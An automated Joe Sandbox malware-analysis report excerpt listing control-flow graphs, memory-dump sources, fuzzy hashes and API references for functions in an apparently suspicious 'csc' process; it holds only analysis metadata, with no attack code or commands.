                                                                  control_flow_graph 1473 94b9d40-94b9d46 1474 94b9d4f-94b9d53 1473->1474 1475 94b9d5e-94b9d73 1474->1475 1476 94b9d55-94b9d5b 1474->1476 1478 94b9d79-94b9e4c call 94b24c0 1475->1478 1479 94b9ebf-94b9f0c 1475->1479 1476->1475 1495 94b9e52-94b9e66 1478->1495 1496 94b99c6-94b99cd 1478->1496 1480 94b9f0e-94b9f6e 1479->1480 1481 94b9f70-94b9fb7 1479->1481 1483 94b9fbd-94ba00d 1480->1483 1481->1483 1539 94ba013 call 94ba160 1483->1539 1540 94ba013 call 94ba144 1483->1540 1486 94ba019 1488 94ba07e-94ba093 1486->1488 1492 94b9a6a-94b9be9 1488->1492 1493 94ba099-94ba0ba 1488->1493 1492->1473 1501 94ba0c1-94ba0d4 call 94b2408 1493->1501 1495->1496 1499 94b9a4f-94b9a65 1496->1499 1500 94b99d3-94b99e8 1496->1500 1499->1501 1500->1488 1508 94b99ee-94b9a1e 1500->1508 1511 94ba0d5 1501->1511 1516 94b9a2c-94b9a4d 1508->1516 1517 94b9a20-94b9a2a 1508->1517 1511->1511 1516->1499 1517->1499 1517->1516 1539->1486 1540->1486
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $lI$hI
                                                                  • API String ID: 0-1152085018
                                                                  • Opcode ID: 7cc28c469bae04c0a8c3eef757ffe202bff73cdaab224e322cea285da86952ae
                                                                  • Instruction ID: 8746084aefce58aabb76a0e13caf2448b5c9d4ee0fac09b69ff82fb64e4d49be
                                                                  • Opcode Fuzzy Hash: 7cc28c469bae04c0a8c3eef757ffe202bff73cdaab224e322cea285da86952ae
                                                                  • Instruction Fuzzy Hash: 4EE1A3B5A002288FDB64DF69C990B9DBBF2BF88304F1145DAD549AB351DB309E81CF61
                                                                  Function 094BF180 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1541 94bf180-94bf1ae 1542 94bf1ca-94bf1e2 call 94b8ca0 1541->1542 1543 94bf1b0-94bf1c8 call 94b8d40 1541->1543 1550 94bf1e4-94bf1eb 1542->1550 1543->1550 1551 94bf20e-94bf213 1550->1551 1552 94bf1ed-94bf1f1 1550->1552 1553 94bf23d-94bf247 1551->1553 1552->1551 1554 94bf1f3-94bf20c 1552->1554 1555 94bf249-94bf25c call 94b8e30 1553->1555 1556 94bf25e-94bf262 1553->1556 1554->1551 1568 94bf215-94bf23a call 94b8d40 1554->1568 1557 94bf27f-94bf283 1555->1557 1556->1557 1558 94bf264-94bf268 1556->1558 1561 94bf2dd-94bf308 1557->1561 1562 94bf285-94bf2d8 call 94b7f90 call 94b8588 call 94b85c8 call 94beba8 call 94b8e30 1557->1562 1558->1557 1563 94bf26a-94bf277 call 94b7f90 1558->1563 1581 94bf310-94bf314 1561->1581 1562->1561 1563->1557 1573 94bf27a call 94b8e30 1563->1573 1568->1553 1573->1557 1584 94bf31a-94bf31e 1581->1584 1585 94bf3dc-94bf3ef 1581->1585 1588 94bf3d1-94bf3d7 call 94b7f90 1584->1588 1589 94bf324-94bf328 1584->1589 1590 94bf3f1-94bf3f5 1585->1590 1588->1585 1589->1588 1595 94bf32e-94bf3cf call 94b7f90 * 2 call 94b8588 * 2 call 94bb570 call 94b7f90 call 94b86d8 1589->1595 1592 94bf400 1590->1592 1593 94bf3f7 1590->1593 1599 94bf401 1592->1599 1593->1592 1595->1590 1599->1599
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I$h`I
                                                                  • API String ID: 0-4255524651
                                                                  • Opcode ID: 3b52ab1bb9f88c8e612869f1c542cef91c5234bafe1c6f0b71b5d212be5a3afd
                                                                  • Instruction ID: 78395b621ffb4a03aced51ec178f3fa19ea3e60a4bf322ae989c886a39c97af0
                                                                  • Opcode Fuzzy Hash: 3b52ab1bb9f88c8e612869f1c542cef91c5234bafe1c6f0b71b5d212be5a3afd
                                                                  • Instruction Fuzzy Hash: 12815E34B106088FCB19EF69C45479DB7B6BF89304F10856EE4069B3A5CB75ED46CBA0
                                                                  Function 094BA160 Relevance: 2.7, Strings: 2, Instructions: 158COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1615 94ba160-94ba16c 1616 94ba1c8-94ba22b 1615->1616 1617 94ba16e-94ba17e 1615->1617 1630 94ba22d-94ba250 call 94b5af0 1616->1630 1631 94ba2a7-94ba2d8 call 94ba2f1 1616->1631 1620 94ba1af-94ba1c7 1617->1620 1621 94ba180-94ba18c 1617->1621 1625 94ba18e-94ba1a4 1621->1625 1626 94ba1a5-94ba1ae 1621->1626 1630->1631 1635 94ba252-94ba2a4 1630->1635 1636 94ba2de-94ba2e7 1631->1636
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DKI$xLI
                                                                  • API String ID: 0-1546764423
                                                                  • Opcode ID: eab9549ed890b77ea8d73975c151b129149d1f6fd38aeab09c71241077dfc618
                                                                  • Instruction ID: 0c21155d7d2b36bd6b0545e23e9446fd972afabbfa53b98d2238887244664ba6
                                                                  • Opcode Fuzzy Hash: eab9549ed890b77ea8d73975c151b129149d1f6fd38aeab09c71241077dfc618
                                                                  • Instruction Fuzzy Hash: 6041D3327001586FDF058EE99C509FFBBEEEF89211B04406BFA05E7251CA25CD269BB0
                                                                  Function 094BDB58 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +pY$h`I
                                                                  • API String ID: 0-3832040207
                                                                  • Opcode ID: 63208c169cfa15bc4f81cf1fae6e9a6caa788b0eb2075a390bb6bf5803df0e37
                                                                  • Instruction ID: 7921700c999ec3378fed58dd54d1f24d2dd0df4165050235ce4d3313cb380edc
                                                                  • Opcode Fuzzy Hash: 63208c169cfa15bc4f81cf1fae6e9a6caa788b0eb2075a390bb6bf5803df0e37
                                                                  • Instruction Fuzzy Hash: F6414630B206158FCB09EB69D454AAE77BAEFC8704F10951ED5069F394CF749C46CBA1
                                                                  Function 094B90F0 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1692 94b90f0-94b90ff 1693 94b9119-94b9122 1692->1693 1694 94b9101-94b910d 1692->1694 1695 94b916f-94b9175 1693->1695 1696 94b9124-94b9127 1693->1696 1694->1693 1700 94b910f-94b9118 1694->1700 1698 94b9129-94b9136 1696->1698 1699 94b9176-94b91a5 1696->1699 1703 94b9138-94b913e 1698->1703 1704 94b9166-94b916d 1698->1704 1707 94b91a7-94b91ab call 94b9210 1699->1707 1708 94b91b4-94b91b8 1699->1708 1703->1699 1705 94b9140-94b9150 1703->1705 1704->1695 1704->1696 1714 94b9152 call 94b9089 1705->1714 1715 94b9152 call 94b9098 1705->1715 1716 94b9152 call 94b90f0 1705->1716 1710 94b91b1-94b91b3 1707->1710 1711 94b9158-94b915a 1711->1704 1712 94b915c-94b9165 1711->1712 1714->1711 1715->1711 1716->1711
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 85I$85I
                                                                  • API String ID: 0-860387334
                                                                  • Opcode ID: e3a4fed04d7df92cd9dfe1aa7bc0a3f3518d80489dc2fa6a0bf40949928916bd
                                                                  • Instruction ID: 0ca4a298cd76cc87511282a2621d0f077fb3c055f1d11c2aa1925023bc992feb
                                                                  • Opcode Fuzzy Hash: e3a4fed04d7df92cd9dfe1aa7bc0a3f3518d80489dc2fa6a0bf40949928916bd
                                                                  • Instruction Fuzzy Hash: 5221A6313052109FD7148E69E944667BBA9EFC1358B15816BE10ACB252DB25EC01C7A1
                                                                  Function 094B6EC0 Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1737 94b6ec0-94b6ee8 1739 94b6eea-94b6f31 1737->1739 1740 94b6f36-94b6f44 1737->1740 1788 94b738d-94b7394 1739->1788 1741 94b6f53 1740->1741 1742 94b6f46-94b6f51 call 94b3e48 1740->1742 1744 94b6f55-94b6f5c 1741->1744 1742->1744 1747 94b6f62-94b6f66 1744->1747 1748 94b7045-94b7049 1744->1748 1751 94b6f6c-94b6f70 1747->1751 1752 94b7395-94b73bd 1747->1752 1749 94b704b-94b705a call 94b22e8 1748->1749 1750 94b709f-94b70a9 1748->1750 1766 94b705e-94b7063 1749->1766 1757 94b70ab-94b70ba call 94b17e8 1750->1757 1758 94b70e2-94b7108 1750->1758 1755 94b6f82-94b6fe0 call 94b3b88 call 94b5570 1751->1755 1756 94b6f72-94b6f7c 1751->1756 1761 94b73c4-94b73ee 1752->1761 1797 94b7453-94b747d 1755->1797 1798 94b6fe6-94b7040 1755->1798 1756->1755 1756->1761 1771 94b70c0-94b70dd 1757->1771 1772 94b73f6-94b740c 1757->1772 1784 94b710a-94b7113 1758->1784 1785 94b7115 1758->1785 1761->1772 1773 94b705c 1766->1773 1774 94b7065-94b709a call 94b6988 1766->1774 1771->1788 1799 94b7414-94b744c 1772->1799 1773->1766 1774->1788 1790 94b7117-94b713f 1784->1790 1785->1790 1802 94b7210-94b7214 1790->1802 1803 94b7145-94b715e 1790->1803 1807 94b747f-94b7485 1797->1807 1808 94b7487-94b748d 1797->1808 1798->1788 1799->1797 1809 94b728e-94b7298 1802->1809 1810 94b7216-94b722f 1802->1810 1803->1802 1828 94b7164-94b7173 call 94b1780 1803->1828 1807->1808 1816 94b748e-94b74cb 1807->1816 1813 94b729a-94b72a4 1809->1813 1814 94b72f5-94b72fe 1809->1814 1810->1809 1832 94b7231-94b7240 call 94b1780 1810->1832 1829 94b72aa-94b72bc 1813->1829 1830 94b72a6-94b72a8 1813->1830 1818 94b7300-94b732e call 94b3380 call 94b33a0 1814->1818 1819 94b7336-94b7383 1814->1819 1818->1819 1838 94b738b 1819->1838 1847 94b718b-94b71a0 1828->1847 1848 94b7175-94b717b 1828->1848 1835 94b72be-94b72c0 1829->1835 1830->1835 1854 94b7258-94b7263 1832->1854 1855 94b7242-94b7248 1832->1855 1843 94b72ee-94b72f3 1835->1843 1844 94b72c2-94b72c6 1835->1844 1838->1788 1843->1813 1843->1814 1850 94b72c8-94b72e1 1844->1850 1851 94b72e4-94b72e9 call 94b0580 1844->1851 1860 94b71a2-94b71ce call 94b24c0 1847->1860 1861 94b71d4-94b71dd 1847->1861 1856 94b717f-94b7181 1848->1856 1857 94b717d 1848->1857 1850->1851 1851->1843 1854->1797 1868 94b7269-94b728c 1854->1868 1866 94b724a 1855->1866 1867 94b724c-94b724e 1855->1867 1856->1847 1857->1847 1860->1799 1860->1861 1861->1797 1865 94b71e3-94b720a 1861->1865 1865->1802 1865->1828 1866->1854 1867->1854 1868->1809 1868->1832
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8VI
                                                                  • API String ID: 0-613224888
                                                                  • Opcode ID: c640bfbb3aaeb83ccc980c1a4ab62dd6b9955bc1b6b0ea6606bacde7cdfa5f88
                                                                  • Instruction ID: 79da43e813445488dab35b6180e4778bd98b047186d028476f33f38a29c398f2
                                                                  • Opcode Fuzzy Hash: c640bfbb3aaeb83ccc980c1a4ab62dd6b9955bc1b6b0ea6606bacde7cdfa5f88
                                                                  • Instruction Fuzzy Hash: 04126F71A002049FDB24DFA5C8846AEB7F2FF88305F14852EE8469B751DB75EC46CBA1
                                                                  Function 094BDDA8 Relevance: 1.7, Strings: 1, Instructions: 437COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I
                                                                  • API String ID: 0-3479603000
                                                                  • Opcode ID: fb5ab0fb9b7741191d10167d49b041494f3966e82736301195a645509ff2ac86
                                                                  • Instruction ID: 09794d32209743c68b3bdb46b9461a4583d5eaab4fa01d8999f86714982451e9
                                                                  • Opcode Fuzzy Hash: fb5ab0fb9b7741191d10167d49b041494f3966e82736301195a645509ff2ac86
                                                                  • Instruction Fuzzy Hash: 2312F934A002198FCB14EF65C894B9EB7B2BF89300F5095A9E549AB355DF70ED85CFA0
                                                                  Function 094B7D88 Relevance: 1.7, Strings: 1, Instructions: 406COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I
                                                                  • API String ID: 0-3479603000
                                                                  • Opcode ID: 898299b903c3c569c09feffb279dfb440532c80d51fb75156c6629d3444e3ea1
                                                                  • Instruction ID: c5f5c5a083ad2a1708c5d8d17a661843f2970fc2f72582526b35952ddb752b7f
                                                                  • Opcode Fuzzy Hash: 898299b903c3c569c09feffb279dfb440532c80d51fb75156c6629d3444e3ea1
                                                                  • Instruction Fuzzy Hash: 03D15F72A00214DFDB09CF64C840E997BB6FF89310F0684A9E609AB272D772ED55DF91
                                                                  Function 094B8780 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I
                                                                  • API String ID: 0-3479603000
                                                                  • Opcode ID: 932624f6b3e6a412cb26af2be1fe41261fa9a334b2447269f978e44fafa7ecff
                                                                  • Instruction ID: 28bad1632ae923840a4edd635c62e1b83879ee53cf322b72a86d7935e6479610
                                                                  • Opcode Fuzzy Hash: 932624f6b3e6a412cb26af2be1fe41261fa9a334b2447269f978e44fafa7ecff
                                                                  • Instruction Fuzzy Hash: 00F1DB34B00218DFCB08DFA4D994A9DB7B6FF89305F258159E906AB3A5DB70EC42CB51
                                                                  Function 0698F678 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0698F6EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2629325794.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6980000_csc.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 859685925647a403c2453484acca333cb67cc6de4e3a2836f0a4bdce3f13ab4c
                                                                  • Instruction ID: 8ee2ed22bd8211b398bcf2771f7f1ba846447163bf88d25d2150d94bfda2aada
                                                                  • Opcode Fuzzy Hash: 859685925647a403c2453484acca333cb67cc6de4e3a2836f0a4bdce3f13ab4c
                                                                  • Instruction Fuzzy Hash: 3D11E471D003099FDB20DFAAC484B9EFBF5EF48320F148429D419A7250C7759945CBA1
                                                                  Function 094BB8A8 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I
                                                                  • API String ID: 0-3479603000
                                                                  • Opcode ID: 9f20b9579b6ed132a79888eca8f90e124a03ca33952ec653e2f7982ffdf4d1a1
                                                                  • Instruction ID: 33e07c27affd5c60f1e3e67a5f0cf4307a2fab878f827590402d37f2e60f6b52
                                                                  • Opcode Fuzzy Hash: 9f20b9579b6ed132a79888eca8f90e124a03ca33952ec653e2f7982ffdf4d1a1
                                                                  • Instruction Fuzzy Hash: 5AC1C875B10218DFCB08DFA8C994AADB7B6FF89304F104569E506AB3A5DB71AC42CF50
                                                                  Function 094BDD98 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I
                                                                  • API String ID: 0-3479603000
                                                                  • Opcode ID: a07083101bb0f373a564c954ec64d9a37fa486a066ebb35a6384b33defa95995
                                                                  • Instruction ID: 00e4b60c9125ac129cdb5963aa01e639b9e72488578f3ace20acb932ec0c6cba
                                                                  • Opcode Fuzzy Hash: a07083101bb0f373a564c954ec64d9a37fa486a066ebb35a6384b33defa95995
                                                                  • Instruction Fuzzy Hash: FFA10B74A002188FDB14DF25C894B9EB7B2BF89300F5095A9E94AAB355DF70ED85CF50
                                                                  Function 094BED40 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I
                                                                  • API String ID: 0-3479603000
                                                                  • Opcode ID: 28d0ba490132ef32fbfdaf4ccb43318f71f1af35bd240b63f4d19028f40f4b19
                                                                  • Instruction ID: fbf306893d14f0bbfc39642a7110a2d1ae7529f8e77e60459f74711848ea240e
                                                                  • Opcode Fuzzy Hash: 28d0ba490132ef32fbfdaf4ccb43318f71f1af35bd240b63f4d19028f40f4b19
                                                                  • Instruction Fuzzy Hash: 60911D30B106149FCB05DF68D494AAE77B6EF89700F1481AAE506DF3A5CB35EC42CBA1
                                                                  Function 094B877A Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I
                                                                  • API String ID: 0-3479603000
                                                                  • Opcode ID: 9f18f5b49d602ae398fda21c9d084f2aa1d352625cd3be8df1e0a45d5317e54e
                                                                  • Instruction ID: d60fd476e5331eb729452fb553427aa8f5adaa2ce8430afef09a93104909556a
                                                                  • Opcode Fuzzy Hash: 9f18f5b49d602ae398fda21c9d084f2aa1d352625cd3be8df1e0a45d5317e54e
                                                                  • Instruction Fuzzy Hash: E4A1EC34A10218DFCB08DFA4D894A9DB7B6FF88304F158159E906AB365DB70EC46CF51
                                                                  Function 094BF17A Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I
                                                                  • API String ID: 0-3479603000
                                                                  • Opcode ID: 26cb2839e1c4ba6c91260f84d9a9a857a0733734b988a4939e87590917fe43a7
                                                                  • Instruction ID: 3538210a545ab97d358dd02b91fc8b6500c31970c43bcbba9de6a8cb697515c9
                                                                  • Opcode Fuzzy Hash: 26cb2839e1c4ba6c91260f84d9a9a857a0733734b988a4939e87590917fe43a7
                                                                  • Instruction Fuzzy Hash: 3A617134610A088FCB19EF69C4547DDB7B6BF89304F10856EE4069B3A4CB75ED4ACBA0
                                                                  Function 094BED30 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I
                                                                  • API String ID: 0-3479603000
                                                                  • Opcode ID: 4ef1bedfa214e7994a49c46a243cc246cb0ac2827cd5258b888a7382ae1d8830
                                                                  • Instruction ID: de5fd86f90f60454bdfb9a38f27df7bdbbf21c2f739a30537ffa764386ea654e
                                                                  • Opcode Fuzzy Hash: 4ef1bedfa214e7994a49c46a243cc246cb0ac2827cd5258b888a7382ae1d8830
                                                                  • Instruction Fuzzy Hash: 4061FB34A10614DFCB04DF69D494AAEB7B6FF88710F14816AE5069F365CB70EC42CBA1
                                                                  Function 094B7D62 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I
                                                                  • API String ID: 0-3479603000
                                                                  • Opcode ID: 64718bd47f6d2f20f4e6bf9eea451b34a40e4d401337b8c3947c6b0f9077ac4a
                                                                  • Instruction ID: 21c83d582b6ee980eb82829565eccb60ca94618f208be760b3a3d01352b89eac
                                                                  • Opcode Fuzzy Hash: 64718bd47f6d2f20f4e6bf9eea451b34a40e4d401337b8c3947c6b0f9077ac4a
                                                                  • Instruction Fuzzy Hash: 6341E6706003449FDB15DF68C8407AEBBB6BFCA304F54846DC445AB752DB71AD46CBA1
                                                                  Function 094B6988 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ^jK
                                                                  • API String ID: 0-629655313
                                                                  • Opcode ID: 39a31bbba863683564e5de3307f7cc1e593074aa8fd0b7cc158d462c1f6eb49c
                                                                  • Instruction ID: 82731c513d3d5b5fb30337dc25b4a09ddbb965fc5aec70f6b27f6d06d8016323
                                                                  • Opcode Fuzzy Hash: 39a31bbba863683564e5de3307f7cc1e593074aa8fd0b7cc158d462c1f6eb49c
                                                                  • Instruction Fuzzy Hash: B421F531A002098FDB04DF95C585ADEB7F2BB4D310F2181A9E405AB3A5CB72AD45CBA0
                                                                  Function 094B8CA0 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h`I
                                                                  • API String ID: 0-3479603000
                                                                  • Opcode ID: 987af6f6103038c0b9c21659c1eec5cb7374554ab5e047cc1292f5f6e04f29be
                                                                  • Instruction ID: 578f31bb4609eebe5066f32273ebcdaccde6c331e8eb86437678dbfecd21972d
                                                                  • Opcode Fuzzy Hash: 987af6f6103038c0b9c21659c1eec5cb7374554ab5e047cc1292f5f6e04f29be
                                                                  • Instruction Fuzzy Hash: EA0121717012404B9B14AF1DD8D496AB7AAEFD5625718803AF906CF316CE71DC05D7A4
                                                                  Function 0698F828 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2629325794.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6980000_csc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: cbc69d2540b5ccaf9e1e9fb6d120c0efc49e47d0327415bfae277b70b15ec2bc
                                                                  • Instruction ID: 3a43cf394d2e3fdcb8d92be50b70a2861312cbdc4ad0c589347e76ddf1a55cbb
                                                                  • Opcode Fuzzy Hash: cbc69d2540b5ccaf9e1e9fb6d120c0efc49e47d0327415bfae277b70b15ec2bc
                                                                  • Instruction Fuzzy Hash: A1113A71D003488FDB24DFAAD444BDEFBF5EF88320F248419D419A7240C7796945CBA5
                                                                  Function 094A0078 Relevance: .6, Instructions: 597COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630602771.00000000094A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94a0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7a43a93d6aeae3838705d30eba65c6cf9214bffddf8879ff154c125b664cef0d
                                                                  • Instruction ID: fa65ff1070752739b3bd5a3c4965fd3a6983b42ce0b5f2bbdce31a56aa875a31
                                                                  • Opcode Fuzzy Hash: 7a43a93d6aeae3838705d30eba65c6cf9214bffddf8879ff154c125b664cef0d
                                                                  • Instruction Fuzzy Hash: 1202B070B403158BFA351A69085433B3BD6ABE7B95F44042BE947EB385DE61EC4387A3
                                                                  Function 094B3400 Relevance: .5, Instructions: 534COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_94b0000_csc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4e56486cd4b652e309fa98e62e513e847bc1b56d9eca95c39bc627e04188a9a1
                                                                  • Instruction ID: 92ec1adc9fa73d88112754324a2140a6267f5031e7058479ed3b5754f3b6cf73
                                                                  • Opcode Fuzzy Hash: 4e56486cd4b652e309fa98e62e513e847bc1b56d9eca95c39bc627e04188a9a1
                                                                  • Instruction Fuzzy Hash: 89227D75B002149FDB14DFA9D490AADB7B2FF88314F15816AE905AF361DB72EC41CBA0
                                                                  Function 094B2811 Relevance: .5, Instructions: 525COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2630621166.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
